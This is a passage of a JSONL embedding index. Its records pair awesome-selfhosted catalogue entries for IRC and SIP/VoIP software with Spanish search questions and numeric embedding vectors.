0.08637, -0.00305, 0.00863, -0.06093, 0.07082, -0.03175, -0.00054, 0.01199, 0.02629, -0.0687, 0.07464, -0.00874, -0.04966, -0.00152, -0.03817, -0.04333, -0.06279, 0.05435, -0.0256, -0.00968, 0.09948, -0.11086, -0.02813, -0.01591, -0.02038, -0.01892, -0.01827, -0.02179, -0.0368, -0.02811, -0.04238, -0.10802, 0.01171, -0.00605, -0.03754, -0.07474, -0.04052, 0.04728, 0.00023, -0.04292, -0.03266, 0.0274, -0.024, -0.01075, -0.00974, -0.03018, 0.07454, 0.02205, 0.0993, -0.00844, -0.02332, 0.13785, -0.0601, -0.03142, -0.0077, 0.0266, -0.09752, -0.00652, 0.0201, 0.05387, 0.0612, 0.00739, -0.02894, 0.03215, 0.02951, 0.04739, 0.00699, 0.02726, 0.01522, -0.01018, 0.02231, 0.00148, 0.03317, 0.01836, -0.00503, 0.0301, 0.00201, -0.04058, -0.02257, 0.07779, 0.13254, 0.01461, 0.0069, -0.0407, -0.07096, -0.1014, 0.02563, -0.01861, -0.01625, -0.02375, 0.02497, 0.0423, 0.02223, 0.00053, -0.04971]} -{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "con que puedo conectar mis diferentes dispositivos para mantener mi conversaciΓ³n activa aunque uno de ellos se apague momentΓ‘neamente?", "v": [-0.1458, 0.3544, -0.21318, 0.01022, -0.06179, -0.02234, -0.13272, 0.04045, -0.12328, -0.09855, -0.0479, -0.00892, -0.06272, 0.06666, 0.08086, 0.02017, 0.08813, 0.0353, 0.01819, -0.05284, 0.03315, 0.0144, -0.06931, -0.03594, 0.02425, 0.02349, 0.14337, 0.07068, -0.09438, -0.05076, 0.0379, -0.01097, 0.0798, 0.02153, -0.03852, -0.07283, -0.09504, 0.13298, 0.0717, 0.02261, -0.10199, -0.01454, -0.05234, -0.00671, 0.09958, 0.06261, -0.04489, -0.04974, -0.06376, 0.09722, -0.09536, 0.04545, -0.04236, -0.01322, -0.09739, 0.02648, 0.20911, -0.05664, 0.08568, -0.05394, -0.06591, 0.03445, -0.00915, -0.01258, 0.12593, 0.00179, -0.01418, -0.01094, -0.06457, 0.06739, -0.02409, 0.00396, -0.09179, 0.03731, 0.03638, 0.13889, 0.00076, -0.05182, 0.03063, 0.13728, 0.04701, -0.0268, 0.05534, 0.04239, -0.10184, -0.01158, 0.07784, -0.02299, -0.017, -0.04568, 0.04025, -0.00739, -0.05447, -0.0128, -0.04505, -0.02663, -0.02797, 0.00783, 0.0349, 0.0141, 0.11441, 0.07347, -0.06719, 0.07641, -0.06087, -0.01983, 0.04872, -0.06194, 0.08676, -0.07208, -0.0243, -0.05307, -0.03677, -0.10145, -0.03806, 0.04102, -0.04832, -0.07991, -0.001, 0.06682, -0.06198, -0.03263, 0.07939, -0.00314, 0.0141, 0.06121, -0.08378, 0.01405, 0.06037, 0.09138, 0.04847, 0.02627, 0.08389, -0.13321, 0.03257, 0.01562, 0.01426, -0.02053, -0.0182, -0.05044, 0.06441, 0.01758, -0.00793, -0.06928, 0.07561, 0.03466, 0.01992, -0.05992, -0.01316, 0.03935, 0.01705, 0.01845, 0.03144, 0.04897, -0.01355, 0.05765, 0.01094, -0.02472, 0.0103, 0.08307, -0.03544, -0.00602, 0.00726, -0.05113, 0.02352, -0.04434, -0.11928, -0.05335, 0.10071, 0.00193, -0.0479, 0.00809, 0.02206, -0.03421, -0.02841, 0.00966, 0.02328, -0.01295, 0.02728, -0.07429, -0.08135, 0.02102, -0.03433, -0.03639, -0.00027, 0.01664, -0.07891, -0.02731, -0.0213, 0.06319, -0.0269, 0.05217, 0.02604, 0.01029, 0.02535, -0.11025, 0.01228, -0.01878, 0.03309, 0.01911, -0.03886, -0.02712, 0.04086, 0.02114, 0.01599, 0.04793, -0.05571, 0.00162, 0.03733, 0.03182, 0.06095, -0.01821, 0.09708, -0.04368, -0.04899, -0.01852, -0.01859, -0.04975, -0.00551, 0.03292, 0.09362, 0.04883, 0.06617, -0.00493, 0.00299, 0.03414, -0.02068, 0.01039, 0.02979, 0.00322, -0.01725, -0.01444, 0.01031, -0.04822, 0.05079, 0.03421, -0.00282, -0.06843, -0.07985, -0.00949, 0.01165, 0.05589, 0.03764, -0.02484, -0.06316, -0.0336, -0.09201, 0.04714, -0.01887, -0.10198, -0.00849, 0.04826, 0.09194, -0.05076, 0.01131, -0.00178]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "que programa es una alternativa libre para montar un sistema de telefonΓ­a IP desde cero", "v": [0.04355, 0.01581, -0.14009, -0.111, -0.07645, -0.11671, -0.00428, -0.05394, -0.22039, -0.02802, 0.03751, -0.13132, 0.04055, -0.09379, 0.06227, 0.00498, 0.02488, -0.13103, 0.14657, -0.08061, -0.10376, 0.11391, -0.06143, -0.1485, -0.02508, 0.13764, -0.11769, -0.07451, -0.08601, -0.04278, -0.00831, -0.12265, 0.13265, -0.03544, -0.05703, -0.07505, 0.18498, 0.02916, 0.13881, -0.04906, 0.02928, -0.05608, 0.04038, 0.03859, 0.03982, -0.02793, 0.06885, -0.05182, 0.03854, -0.03013, -0.06932, -0.09164, -0.0108, -0.02819, -0.00248, -0.03233, 0.07128, -0.08587, -0.07089, -0.08437, 0.01894, 0.1524, -0.02006, -0.03285, 0.07936, 0.0072, -0.03072, 0.00936, -0.11077, 0.02852, 0.06899, -0.04472, -0.01277, 0.04336, 0.00705, 0.05413, -0.01569, -0.10339, -0.00099, -0.00311, 0.0151, -0.04014, -0.03508, 0.07376, -0.10058, 0.01643, 0.11863, -0.08387, -0.05711, -0.0188, 0.01618, 0.09525, -0.00442, 0.04642, 0.05642, -0.10917, 0.07567, 0.14193, -0.01663, 0.07119, 0.02564, 0.02961, -0.13602, 0.10673, 0.0904, 0.02219, 0.07481, 0.04494, 0.00374, 0.01648, -0.0879, 0.03041, -0.00223, -0.01857, -0.11979, -0.05254, 0.0494, 0.03211, -0.02036, -0.00735, -0.07771, 0.08638, 0.02284, -0.04621, 0.07492, 0.06189, 0.04072, 0.10795, 0.01016, 0.09281, 0.12709, -0.01628, -0.05391, -0.05956, -0.04427, -0.02214, 0.00083, 0.03284, 0.00813, 0.08473, -0.00926, 0.03862, 0.00582, -0.06033, 0.0583, -0.04073, 0.02571, -0.11092, 0.03717, -0.01588, -0.04088, 0.08748, -0.01721, 0.08032, -0.10204, 0.00639, -0.01575, -0.02738, 0.0044, 0.06809, 0.01763, -0.04436, 0.02139, -0.05525, 0.02003, -0.03517, -0.03935, -0.01433, 0.06879, 0.02952, -0.0272, 0.03646, 0.09891, -0.06208, -0.01895, 0.003, -0.00936, -0.05417, 0.00599, -0.04445, -0.06303, 0.05531, -0.0081, -0.0107, 0.02939, 0.06086, -0.04682, 0.05242, 0.04754, -0.02497, 0.03024, 0.02886, -0.02739, 0.05501, -0.01897, -0.04365, -0.02025, -0.07182, 0.01782, 0.0146, -0.12984, 0.00712, 0.06293, -0.02369, 0.00792, 0.02736, 0.04933, 0.03031, 0.05297, 0.09736, 0.02907, -0.05437, 0.04459, 0.00328, -0.05663, 0.00764, -0.03169, 0.046, 0.02463, 0.0079, 0.02907, -0.00488, -0.01469, 0.06921, -0.04172, -0.01372, -0.01918, 0.08005, -0.01766, -0.03157, 0.00297, -0.07426, 0.00343, -0.01023, 8e-05, -0.02675, 0.01242, -0.01222, -0.00361, -0.04503, 0.02057, 0.11886, -0.00317, 0.00711, -0.04123, -0.02064, -0.04747, 0.00806, -0.0161, -0.04958, -0.03182, 0.05204, -0.00851, -0.00825, -0.0322, 0.03848]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "cual es la mejor herramienta open source para gestionar llamadas y conferencias VoIP", "v": [0.05213, 0.10892, -0.14226, -0.22858, 0.02827, -0.19618, 0.02401, -0.02154, -0.04955, -0.09437, 0.01453, -0.15012, -0.00915, -0.03068, 0.02977, 0.109, 0.0944, -0.1217, 0.02635, 0.00486, -0.02822, 0.14503, -0.10274, -0.08211, -0.09835, 0.01644, 0.0202, -0.05869, -0.02265, -0.04071, 0.02909, -0.10299, 0.02765, -0.07106, -0.0456, 0.04038, -0.03785, 0.1167, -0.02751, 0.04397, -0.16735, 0.06593, -0.13045, 0.04987, 0.11141, -0.06651, -0.02818, 0.03253, 0.01263, 0.04146, -0.15697, -0.15397, -0.05444, 0.03088, -0.06149, -0.0021, 0.0675, -0.12868, -0.02546, -0.07065, -0.05995, 0.03389, 0.0097, -0.04464, 0.04848, -0.08887, 0.03109, -0.05102, -0.1191, 0.03753, -0.12605, 0.01604, -0.0031, 0.13992, 0.11532, -0.01472, -0.03082, -0.01078, 0.00172, 0.08349, 0.0829, -0.05298, -0.0774, 0.03336, -0.14036, -0.00378, 0.08935, -0.02737, -0.08853, -0.02197, -0.0092, 0.01098, -0.00805, -0.0458, -0.01297, -0.04539, 0.02705, 0.01535, -0.02594, 0.05313, 0.0839, 0.06886, -0.10285, 0.04567, 0.01222, 0.04846, 0.00067, -0.07095, -0.03928, -0.06186, -0.06683, 0.01696, 0.0335, 0.06557, 0.03332, -0.01151, 0.05645, -0.07612, 0.01168, -0.05281, 0.00898, -0.00233, -0.03638, -0.04794, -0.0252, -0.0003, -0.04789, 0.09717, 0.08878, -0.01444, 0.05096, -0.08107, -0.02463, -0.05418, 0.08329, -0.03736, 0.07253, -0.03576, 0.05716, -0.07391, -0.08108, 0.0629, 0.057, -0.09045, 0.06821, 0.01817, -0.00245, -0.02623, 0.06231, -0.05252, 0.03891, -0.05229, 0.02681, 0.10251, -0.05669, -0.01698, -0.1283, -0.00988, -0.06408, 0.10794, -0.03858, -0.05107, 0.01825, -0.07171, 0.00999, -0.0399, 0.05292, 0.08465, 0.0175, 0.02881, 0.05339, 0.00285, 0.02195, -0.00468, -0.0653, -0.10527, -0.02408, -0.05751, 0.03486, -0.1381, -0.03947, -0.01595, -0.03512, -0.0535, 0.06082, 0.03712, -0.02126, 0.04327, 0.0281, -0.01944, 0.00394, 0.07737, 0.02454, -0.03575, 0.02616, -0.08009, -0.04502, -0.11604, 0.02468, 0.01548, -0.11578, 0.02681, -0.02293, -0.04615, 0.04687, 0.07175, -0.0439, 0.00397, -0.01067, 0.0239, 0.01934, 0.03786, 0.02779, -0.04009, -0.034, -0.05241, -0.04732, 0.00408, -0.04447, 0.00661, 0.02996, -0.0266, 0.0444, -0.01933, 0.00909, 0.03612, -0.00289, 0.00956, -0.00894, -0.00461, 0.00887, -0.01288, 0.00165, -0.00799, 0.00843, 0.02075, 0.04222, -0.01478, -0.00531, -0.07676, -0.0342, 0.0452, 0.01385, -0.03063, -0.02629, -0.01554, -0.03493, 0.03803, -0.01959, -0.08974, -0.01948, 0.05845, 0.04465, 0.01054, 0.03965, -0.00827]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "que software sirve para recibir notificaciones SIP en mΓ³viles sin que se use la aplicaciΓ³n", "v": [0.00678, 0.1432, -0.20915, -0.21839, 0.09671, -0.21354, -0.1724, -0.10206, -0.0115, 0.01964, -0.03724, -0.10608, 0.12888, -0.08093, -0.0525, -0.03041, 0.02739, -0.14451, -0.00304, 0.08412, 0.03121, 0.13052, -0.03623, -0.07187, -0.04817, 0.19096, 0.04011, 0.0301, -0.09672, -0.00944, 0.04312, -0.07461, 0.10458, -0.06596, -0.09874, 0.00242, -0.01432, -0.04241, -0.03139, -0.03656, 0.09397, -0.02555, -0.10425, -0.03227, -0.00348, -0.02676, -0.02096, 0.04309, -0.01298, 0.03242, -0.03702, -0.04647, -0.0992, 0.00433, -0.07937, 0.00899, 0.1046, -0.10884, 0.09197, -0.01793, -0.06486, 0.0511, 0.00333, -0.01505, 0.0763, -0.08668, 0.11201, 0.095, -0.06715, -0.08444, 0.00627, 0.08623, 0.04165, 0.01454, 0.07062, 0.0503, -0.15483, 0.0322, 0.00029, -0.03259, 0.03618, -0.00473, -0.09865, 0.01532, -0.07271, -0.02022, 0.102, -0.02877, 0.02588, -0.08464, 0.05151, 0.0725, -0.05382, 0.0916, 0.07073, -0.04548, -0.00172, 0.01504, 0.04406, 0.14461, 0.04579, -0.11625, -0.03873, -0.00257, -0.06452, 0.01166, 0.08696, -0.08759, 0.04118, -0.0432, -0.036, -0.04717, -0.02, 0.01516, -0.02092, -0.02445, 0.00592, -0.12667, -0.01635, -0.00726, -0.00191, -0.04359, 0.02154, -0.08301, 0.05585, -0.0181, -0.01036, 0.09935, 0.03352, 0.09602, 0.04516, -0.0759, -0.08614, 0.02573, -0.02952, -0.01225, 0.02121, 0.02251, 0.07783, 0.02047, 0.04783, 0.04495, -0.02646, 0.015, 0.0592, 0.02286, -0.01933, -0.02268, 0.01893, 0.01739, 0.03302, -0.07195, -0.037, 0.01269, -0.07443, -0.00688, -0.01355, -0.0625, -0.01479, 0.05196, -0.09435, -0.00298, -0.0442, -0.00514, -0.0252, -0.09239, 0.0137, 0.03541, 0.08401, 0.04316, 0.0022, 0.03058, 0.05296, -0.05158, -0.05856, -0.06827, -0.00882, 0.06671, -0.00584, -0.06873, -0.07752, 0.01524, -0.0226, -0.00681, 0.0067, -0.03744, -0.05059, 0.01015, 0.01297, 0.03335, -0.04416, 0.09671, 0.04733, -0.01127, -0.00233, -0.07295, -0.03535, -0.01599, 0.00445, -0.0463, -0.06809, -0.01804, -0.08326, -0.02421, 0.06742, 0.06005, -0.00921, 0.07313, -0.01369, 0.07774, -0.01415, 0.00272, 0.05743, 0.06711, -0.03997, -0.08792, 0.08137, 0.04402, -0.01579, 0.02359, -0.02923, -0.02343, 0.00755, 0.00249, -0.02455, 0.06259, 0.01109, 0.01369, 0.01753, -0.00325, -0.04052, 0.03913, -0.00262, -0.0247, 0.05118, 0.00302, 0.00248, -0.03463, -0.05408, -0.07255, -0.02828, 0.05873, 0.0304, 0.0029, -0.0447, -0.06378, -0.03528, -0.01405, 0.01655, -0.06623, 0.01464, 0.0654, 0.09769, 0.00552, 0.03035, -0.00014]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "con que puedo monitorizar y solucionar problemas en llamadas VoIP", "v": [0.00949, 0.15501, -0.25779, -0.09022, -0.00942, -0.15103, 0.07414, -0.05198, -0.0481, -0.08626, 0.12839, -0.09003, 0.06371, -0.01503, 0.02975, -0.00416, -0.01474, -0.11176, 0.07289, -0.0238, 0.06677, -0.01037, -0.04647, -0.00378, -0.09149, 0.18734, -0.06848, -0.03913, 0.01431, -0.14497, -0.12533, -0.18161, 0.05331, 0.02295, -0.14616, 0.02026, 0.01203, 0.10069, -0.02513, 0.10061, -0.03704, 0.04796, -0.05693, -0.10637, 0.10753, 0.01311, 0.01218, -0.02542, 0.07175, -0.03409, -0.16645, -0.01311, -0.01762, 0.04199, -0.03143, -0.00049, 0.0853, -0.0087, 0.06287, -0.07203, -0.10477, -0.05505, 0.09954, -0.0562, 0.10347, -0.05071, 0.00466, -0.0388, -0.04062, 0.00896, -0.01488, 0.13004, -0.05084, 0.03267, 0.11289, 0.01235, -0.12563, -0.14079, 0.03307, 0.03223, 0.05202, 0.02922, -0.08772, -0.01399, -0.11997, -0.0483, 0.01011, -0.06141, -0.07794, -0.06718, 0.03418, 0.12994, 0.0677, -0.02138, 0.00453, 0.00064, 0.1069, 0.01098, -0.06285, 0.02013, 0.0936, 0.02111, -0.06441, 0.02913, 0.01958, -0.0383, 0.08556, -0.03996, 0.07587, -0.08412, -0.11767, 0.06676, 0.01593, -0.05327, -0.09842, -0.06423, -0.01447, 0.04443, -0.04999, 0.03174, -0.03614, -0.01292, 0.05541, -0.04225, 0.04369, -0.01316, 0.09258, 0.0312, 0.09039, 0.06152, 0.04639, -0.0051, -0.04108, -0.1088, 0.01244, -0.02773, -0.02722, 0.02197, 0.0684, -0.00151, -0.0493, 0.04643, 0.05209, -0.04599, 0.05199, 0.08243, -0.05815, -0.04252, -0.01544, -0.01339, 0.03754, 0.03005, 0.05393, 0.08341, -0.02308, 0.0708, -0.02219, 0.05506, 0.02895, 0.06608, 0.01209, -0.01843, -0.0119, -0.00195, 0.0339, -0.05296, -0.03355, 0.09979, 0.07021, -0.01386, -0.05133, -0.01237, -0.01002, -0.10321, -0.05775, -0.00339, -0.04872, -0.02578, 0.00956, -0.07179, -0.09247, 0.08941, -0.025, 0.01361, 0.01923, 0.01403, -0.04263, 0.01551, 0.05516, -0.00928, 0.03726, 0.05096, 0.01184, -0.01294, 0.00663, -0.0443, -0.05382, -0.07609, -0.05879, -0.03766, -0.1088, 0.05262, 0.01115, -0.0222, 0.02522, 0.01423, -0.07048, 0.09064, 0.05072, -0.01377, 0.02136, 0.01493, 0.04822, -0.04035, -0.04254, 0.01672, 0.03071, 0.00459, -0.05398, -0.00204, 0.02884, 0.00135, 0.04626, 0.01842, 0.0032, 0.01229, 0.04301, 0.06104, -0.03005, 0.01282, -0.03478, 0.02397, -0.01513, -0.03167, -0.00969, 0.05831, 0.00939, -0.01879, 0.03764, -0.02202, 0.03635, 0.02922, 0.00426, 0.04616, -0.0467, -0.04012, -0.01721, 0.04242, 0.02059, -0.05499, -0.00245, 0.08713, 0.03096, 0.01107, 0.05771, 0.00892]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "busco una soluciΓ³n completa de conmutador IP (PBX) con interfaz web", "v": [-0.02703, -0.13185, -0.21245, -0.07834, 0.07966, -0.19171, 0.04468, -0.09397, -0.1974, -0.01218, 0.0985, 0.00985, -0.05096, 0.0521, -0.10512, -0.03165, -0.12004, -0.03378, 0.00388, -0.15829, 0.131, 0.13668, -0.11636, 0.00067, -0.01258, 0.14512, -0.12532, 0.04778, -0.0806, -0.04242, -0.08694, -0.15371, -0.02372, 0.03724, -0.12768, -0.1913, 0.00975, 0.14056, -0.02116, 0.04346, 0.07096, 0.0141, -0.02939, -0.01222, 0.06372, 0.07104, 0.03223, -0.0794, -0.0298, -0.0874, -0.10302, -0.07762, -0.08404, 0.02765, -0.09884, -0.03586, 0.1469, -0.06048, 0.06093, -0.02913, -0.11397, 0.09811, -0.06115, -0.04542, 0.06273, -0.05414, -0.17104, 0.01561, 0.01818, 0.02753, 0.02456, 0.06401, -0.00766, 0.01047, 0.04225, 0.04062, -0.08066, 0.03277, 0.11811, 0.0821, 0.09608, 0.03485, -0.11635, 0.00279, -0.09789, -0.01142, 0.11403, -0.17771, -0.02534, -0.11311, 0.05069, 0.05324, 0.04879, -0.03062, 0.01901, -0.08946, 0.06527, 0.0426, -0.00087, -0.05699, 0.0441, 0.11129, -0.1627, 0.02226, -0.00844, -0.08647, 0.03342, 0.05188, -0.07288, 0.01244, -0.01091, -0.01995, 0.04583, -0.08112, -0.04938, -0.03192, -0.00837, 0.01113, 0.04108, -0.02433, -0.03778, 0.0225, 0.01528, 0.02472, 0.03961, 0.01967, 0.0576, 0.05659, 0.05124, -0.00877, -0.01166, -0.09102, -0.07847, -0.05924, 0.04209, 0.02336, -0.03442, 0.03999, 0.03834, 0.01651, 0.07209, -0.01634, -0.00423, 0.0378, 0.0306, 0.00928, -0.0094, -0.01369, -0.04046, 0.0095, 0.0326, -0.01664, 0.06461, 0.03606, -0.10915, 0.01008, 0.02632, 0.02186, 0.04272, -0.01926, -0.02278, 0.0037, 0.01343, -0.00056, 0.02342, -0.00616, -0.12433, 0.02592, 0.04091, -0.05607, -0.01465, 0.03803, -0.00365, -0.06863, -0.02323, 0.03207, -0.04089, -0.07826, 0.03154, -0.05231, -0.02146, -0.02861, 0.00677, 0.01926, -0.02597, -0.04928, 0.04183, -0.00372, -0.04503, -0.04731, 0.02145, -0.00482, -0.02878, 0.00695, 0.08213, 0.01318, -0.00255, -0.03963, -0.01887, -0.03481, -0.00144, -0.01928, -0.01287, -0.0554, -0.03783, 0.00506, -0.0204, -0.00018, -0.02863, 0.02848, -0.0051, -0.00493, 0.05298, 0.00146, -0.01474, 0.01716, 0.0494, -0.01411, 0.02545, 0.00795, -0.04196, 0.01543, -0.01867, -0.00185, 0.00569, -0.03277, 0.02563, -0.02207, -0.02013, -0.01082, -0.04342, -0.00074, -0.02718, -0.0301, 0.03922, 0.01553, -0.03138, -0.03582, -0.00033, -0.00784, -0.0022, 0.00947, -0.02209, 0.03174, 0.00075, -0.05052, -0.05073, 0.03616, -0.00153, -0.01698, -0.04076, 0.01921, -0.00081, 0.02784, -0.03355, 0.02166]} -{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "que alternativa libre a un softswitch como Yeti-Switch o Wazo hay", "v": [-0.1294, 0.0547, -0.16289, 0.03559, -0.05975, 0.02404, -0.20248, -0.18751, 0.04603, -0.03083, -0.00534, -0.11578, -0.04539, 0.07013, 0.05531, -0.00717, 0.05518, -0.1178, -0.00085, 0.01687, -0.01287, -0.01978, -0.06048, -0.1294, 0.10083, 0.04318, 0.0969, 0.06119, -0.09021, 0.11824, 0.0096, 0.01055, 0.12742, 0.11293, 0.08208, 0.0384, 0.05868, 0.00714, 0.18393, -0.10447, 0.09926, -0.09093, -0.01336, 0.02959, 0.10002, -0.01142, -0.04277, -0.02356, 0.09851, 0.08183, -0.11389, -0.07135, -0.0586, 0.00035, 0.0443, -0.03998, 0.16334, -0.0445, -0.02729, -0.00731, -0.08981, 0.08388, 0.02254, -0.06638, 0.02884, 0.03704, -0.18654, 0.0041, -0.03143, 0.19516, 0.01937, -0.04228, 0.05815, 0.02909, -0.08056, 0.1158, -0.14699, -0.04639, 0.00645, 0.02538, 0.02438, -0.00786, 0.06262, 0.0663, -0.03636, 0.02256, 0.03387, -0.19577, 0.06849, 0.01868, -0.02302, 0.02505, -0.02205, 0.13887, 0.0898, -0.05423, 0.00227, 0.05548, 0.01101, 0.05703, -0.02522, 0.00521, -0.09257, 0.05017, -0.07838, -0.02402, 0.08537, -0.03954, -0.09029, 0.03877, -0.05833, 0.08511, 0.02515, 0.0211, 0.02881, 0.02588, -0.0739, 0.01168, 0.07966, 0.05954, -0.01684, -0.04198, -0.02549, -0.0238, 0.00071, 0.09325, 0.07539, 0.01284, -0.04028, 0.01332, 0.12486, -0.05787, -0.07406, -0.06883, -0.07347, 0.03741, 0.10653, 0.04014, 0.07545, 0.06753, 0.04692, 0.035, 0.04644, -0.00102, 0.13205, -0.0416, 0.01218, 0.07798, -0.03408, 0.00301, -0.08375, -0.039, -0.00314, -0.0171, -0.01906, 0.03656, 0.009, 0.02925, -0.09746, 0.09665, -0.05038, -0.07137, -0.02979, -0.00566, -0.01228, 0.06323, -0.04697, -0.00902, -0.05604, -0.03141, -0.03445, 0.07792, 0.04587, 0.02261, 0.03595, -0.04939, 0.01602, 0.00225, 0.01737, -0.0506, 0.06053, -0.0273, -0.03396, 0.02628, 0.0119, 0.03093, -0.10368, 0.02513, 0.00048, 0.09869, -0.0375, 0.04205, -0.06077, -0.01818, 0.02709, 0.04545, -0.01542, -0.00835, -0.05904, -0.02185, -0.03558, 0.02064, -0.02289, -0.05974, -0.01038, -0.01642, -0.02882, 0.05134, 0.00253, 0.07279, -0.01051, -0.0087, 0.03111, 0.00759, 0.01464, -0.01092, -0.00817, -0.02646, 0.02485, 0.016, -0.00079, 0.03182, 0.03148, 0.00979, -0.07719, -0.00573, 0.01453, 0.02865, -0.0248, 0.01607, 0.04687, -0.00811, 0.01141, 0.00312, -0.04355, -0.01712, 0.00283, 0.02712, -0.01808, 0.01332, 0.01198, -0.04013, 0.00645, 